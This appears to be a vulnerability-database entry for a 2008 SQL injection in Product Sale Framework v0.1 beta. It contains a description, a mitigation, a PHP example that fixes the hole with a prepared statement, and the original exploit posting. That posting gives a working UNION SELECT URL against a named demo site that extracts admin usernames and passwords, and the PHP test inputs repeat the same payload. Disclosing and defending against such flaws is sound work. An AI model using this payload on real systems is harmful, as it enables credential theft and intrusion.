Vendor: Product Sale Framework
By: b3hz4d
CVSS: 7.5 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: Product Sale Framework
Affected Version From: v0.1 beta
Affected Version To: v0.1 beta
Patch Exists: NO
Related CWE: N/A
CPE: a:product_sale_framework:product_sale_framework:0.1beta
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Product Sale Framework SQL Injection Vulnerability

A SQL injection vulnerability exists in Product Sale Framework v0.1 beta. The forum_topic_id parameter of the customer.forumtopic.php page is not sanitized before it reaches the SQL query, so an attacker can inject a UNION SELECT against the psf_config_tb table and gain access to the admin username and password.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
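
One way to apply this mitigation to the forum_topic_id parameter, as an added example that is not Product Sale Framework code: the value is validated as a positive integer and then bound to a prepared statement. The function name, the psf_forum_topic_tb table and its columns are hypothetical; psf_config_tb and the sample query-string value come from the advisory text, and the rows are constructed test data.

```php
<?php
// Added example, not the vendor's code. psf_forum_topic_tb and its columns are
// hypothetical; psf_config_tb is the table named in the advisory.

function fetch_forum_topic(PDO $db, $rawId): ?array
{
    // 1. Allow-list validation: forum_topic_id must be a positive integer.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // anything that is not a plain positive integer is rejected
    }
    // 2. Parameterized query: the value is bound as data, never concatenated into SQL.
    $stmt = $db->prepare('SELECT id, title, body FROM psf_forum_topic_tb WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Constructed test data in an in-memory SQLite database (requires pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE psf_forum_topic_tb (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$db->exec('CREATE TABLE psf_config_tb (username TEXT, password TEXT)');
$db->exec("INSERT INTO psf_forum_topic_tb VALUES (1, 'Welcome', 'First topic')");
$db->exec("INSERT INTO psf_config_tb VALUES ('admin', 'constructed-secret')");

$inputs = [
    '1',    // legitimate request
    '-1',   // negative id, rejected by min_range
    // forum_topic_id value from the advisory's request
    '-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb',
];
foreach ($inputs as $in) {
    $row = fetch_forum_topic($db, $in);
    printf("%-40.40s => %s\n", $in, $row === null ? 'rejected / not found' : $row['title']);
}
```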

Exploit-DB raw data:

        +++++++++++++++++++++++In The Name Of Allah+++++++++++++++++++++++++++
        +                                                                    +
        +         Product Sale Framework sql injection Vulnerability         +
        +                                                                    +
        +                      Discovered by b3hz4d                          +
        +                                                                    +
        +                      WwW.DeltaHacking.Net                          +
        +                                                                    +
        +                                                                    +
        +                                                                    +
        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
                                  

                              APA Center of Yazd University   
                                 (https://www.ircert.cc)    

		
AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
DATE   : 06 Dec 2008
SITE   : WwW.DeltaHacking.Net
CONTACT: behzad_sh_66@yahoo.com

#####################################################

APPLICATION   : Product Sale Framework v0.1 beta
DOWNLOAD(free): http://www.productsaleframework.com/downloads/psf.zip
VENDOR        : http://www.productsaleframework.com
DEMO (links)  : http://www.productsaleframework.com

#####################################################


[+] vuln    : 
              customer.forumtopic.php
              
              vulnerability is in forum. All demo links (Admin demo, Affiliate demo, Customer demo) are here:
             
              http://www.productsaleframework.com/

[+] Exploit : 
              Admin Username and Password:

              http://www.kalptarudemos.com/demo/psf/customer/customer.forumtopic.php?forum_topic_id=-1 union select concat(username,0x3a,password),2,3,4,5,6 from psf_config_tb
    
               
##########################################################################################################

# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #

##########################################################################################################

# milw0rm.com [2008-12-07]